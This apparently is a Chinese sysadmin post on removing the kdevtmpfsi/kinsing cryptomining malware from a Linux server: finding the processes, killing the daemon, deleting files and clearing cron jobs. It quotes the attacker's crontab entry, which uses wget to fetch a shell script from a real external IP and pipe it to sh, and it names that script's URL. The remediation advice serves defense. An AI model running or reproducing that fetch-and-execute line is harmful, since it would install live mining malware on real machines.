服务器CPU资源占用一直处于100%的状态，检查发现是kdevtmpfsi占用导致的，此进程为挖矿程序。

处理步骤如下：

kdevtmpfsi 进程处理：

1、# top

     查看cpu占用情况，找到占用cpu的进程     最后是  kdevtmpfsi

2、# netstat -natp 

     根据上面的进程名查看与内网的 tcp 链接异常 ，看到陌生ip，查出为国外ip,估计主机被人种后门了

此时，挖矿脚本大概率定时在你的crontab里面。

crontab -l ，发现异常定时任务，* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

有兴趣可以研究这个sh脚本  http://195.3.146.118/unk.sh

3、解决方法

kdevtmpfsi有守护进程，单独kill掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing，需要kill后才能解决问题。

#查询关联的守护进程 [root@iZwz97v9b9ili0mz7rl188Z overlay2]# systemctl status 2854 ● session-5649.scope - Session 5649 of user root    Loaded: loaded (/run/systemd/system/session-5649.scope; static; vendor preset: disabled)   Drop-In: /run/systemd/system/session-5649.scope.d            └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf    Active: active (abandoned) since 一 2019-12-23 10:41:33 CST; 2 days ago    CGroup: /user.slice/user-0.slice/session-5649.scope            ├─ 2854 /tmp/kdevtmpfsi            └─18534 ./kinsing1oZIY4Aid7

 具体命令：

systemctl status 23437

ps -aux | grep kinsing

ps -aux | grep kdevtmpfsi

kill  -9   23437

kill  -9   18534

cd  /tmp

ls

 rm -rf kdevtmpfsi 

rm -rf /var/tmp/kinsing  记得这个守护进程的文件也要删掉，找不到的话，也可以用这个命令

find / -name kdevtmpfsi

find / -name kinsing

进入/var/spool/cron  查看是否有相关的木马定时任务在执行  有的话删掉再重启下crontab